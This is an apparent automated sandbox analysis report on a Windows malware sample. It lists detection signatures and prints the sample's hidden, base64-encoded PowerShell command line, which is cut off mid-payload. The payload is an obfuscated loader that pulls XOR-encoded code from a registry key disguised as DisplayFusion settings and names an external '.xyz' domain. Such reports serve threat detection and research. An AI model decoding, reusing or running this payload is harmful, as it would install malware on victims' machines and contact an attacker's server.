Edit tour
Windows
Analysis Report
Overview
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to call native functions
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges
Classification
- System is w7x64
- cmd.exe (PID: 2372 cmdline:
cmd /C "cm d.exe /c p owershell -WindowSty le Hidden -E "CgAKAA oAJAB0AGUA eAB0AEEAcw BjAD0AWwBT AHkAcwB0AG UAbQAuAFQA ZQB4AHQALg BFAG4AYwBv AGQAaQBuAG cAXQA6ADoA QQBTAEMASQ BJADsACgAK AAoAJABqAH AAPQAkAG4A dQBsAGwAOw AKAAoAZgB1 AG4AYwB0AG kAbwBuACAA ZwBlAHQAdA BlAHIARgB1 AG4AYwAoAF sAcwB0AHIA aQBuAGcAXQ AkAGIAdABz ADIAKQAgAH sACgAJACQA YgB0AHMAPQ BbAFMAeQBz AHQAZQBtAC 4AQwBvAG4A dgBlAHIAdA BdADoAOgBG AHIAbwBtAE IAYQBzAGUA NgA0AFMAdA ByAGkAbgBn ACgAJABiAH QAcwAyACkA OwAKAAoACQ AkAHMAdAA9 ACQAdABlAH gAdABBAHMA YwAuAEcAZQ B0AEIAeQB0 AGUAcwAoAC cARwBlAHQA LQBJAHQAZQ BtAFAAcgBv AHAAZQByAH QAeQBWAGEA bAB1AGUAJw ApADsACgAJ ACQAZQBkAD 0AJABiAHQA cwBbADAALg AuADQAXQA7 AAoACgAJAC QAaQA9ADAA OwAKAAkAJA BsAD0AJABl AGQALgBMAG UAbgBnAHQA aAA7AAoACQ AkAGsAPQBA ACgAKQA7AA oACgAJAFsA YQByAHIAYQ B5AF0AOgA6 AFIAZQBzAG kAegBlACgA WwByAGUAZg BdACQAawAs ACQAcwB0AC 4AbABlAG4A ZwB0AGgAKQ A7AAoACQBm AG8AcgBlAG EAYwBoACgA JABiACAAaQ BuACAAJABz AHQAKQAgAH sAJABrAFsA JABpACsAKw BdAD0AJABi ACAALQBiAH gAbwByACAA JABlAGQAWw AkAGkAJQAk AGwAXQB9AA oACgAJACQA YgBzAD0AJA BiAHQAcwBb ADUALgAuAC QAYgB0AHMA LgBsAGUAbg BnAHQAaABd ADsACgAKAA kAJABpAD0A MAA7AAoACQ AkAGwAPQAk AGsALgBMAG UAbgBnAHQA aAA7AAoACQ AkAGQAdAA9 AEAAKAApAD sACgAKAAkA WwBhAHIAcg BhAHkAXQA6 ADoAUgBlAH MAaQB6AGUA KABbAHIAZQ BmAF0AJABk AHQALAAkAG IAcwAuAGwA ZQBuAGcAdA BoACkAOwAK AAkAZgBvAH IAZQBhAGMA aAAoACQAYg AgAGkAbgAg ACQAYgBzAC kAIAB7ACQA ZAB0AFsAJA BpACsAKwBd AD0AJABiAC AALQBiAHgA bwByACAAJA BrAFsAJABp ACUAJABsAF 0AfQAKAAoA CQByAGUAdA B1AHIAbgAg ACQAdABlAH gAdABBAHMA YwAuAEcAZQ B0AFMAdABy AGkAbgBnAC gAJABkAHQA KQAgAHwAIA BDAG8AbgB2 AGUAcgB0AE YAcgBvAG0A LQBKAHMAbw BuADsACgB9 AAoACgAKAC QAdgAgAD0A IAAiADAAIg A7AAoAJABs AHYAIAA9AC AAIgA4ACIA OwAKACQAZA AgAD0AIAAi AG0AcABsAG 8AeQBlAGUA cwBpAGgAaQ BnAGgALgB4 AHkAegAiAD sACgAkAGUA cAAgAD0AIA AiAFcAeQBJ ADQATQBEAE kAegBNAHoA VQAzAE8ARA BZADMATQBU AEEAegBPAF QAZwB4AE0A RABVAGkATA BEAEUAMgBO AEQAawAzAE 4ARABjADMA TQBUAFIAZA AiADsACgAK ACQAZwBwAE 4AYQBtAGUA IAA9ACAAIg BIAEsAQwBV ADoAXABTAG 8AZgB0AHcA YQByAGUAXA BCAGkAbgBh AHIAeQBGAG 8AcgB0AHIA ZQBzAHMAUw BvAGYAdAB3 AGEAcgBlAF wAIgA7AAoA CgB0AHIAeQ AgAHsACgAJ ACQAagBwAD 0AJAB0AGUA eAB0AEEAcw BjAC4ARwBl AHQAUwB0AH IAaQBuAGcA KABbAFMAeQ BzAHQAZQBt AC4AQwBvAG 4AdgBlAHIA dABdADoAOg BGAHIAbwBt AEIAYQBzAG UANgA0AFMA dAByAGkAbg BnACgAJABl AHAAKQApAC AAfAAgAEMA bwBuAHYAZQ ByAHQARgBy AG8AbQAtAE oAcwBvAG4A OwAKAH0AIA BjAGEAdABj AGgAewB9AA oACgAkAGoA ZAAgAD0AIA AkAG4AdQBs AGwAOwAKAA oACgAkAGEA IAA9ACAAJA B0AGUAeAB0 AEEAcwBjAD sACgAKACQA cgBrAGUAeQ BOACAAPQAg ACIARABpAH MAcABsAGEA eQAgAEYAdQ BzAGkAbwBu ACIAOwAKAC QAdQA9ACQA agBwAFsAMA BdADsACgAk AGkAcwA9AC QAagBwAFsA MQBdADsACg AKAHcAaABp AGwAZQAoAC QAdAByAHUA ZQApACAAew AKAAkAdABy AHkAIAB7AA oACQAJAHQA cgB5ACAAew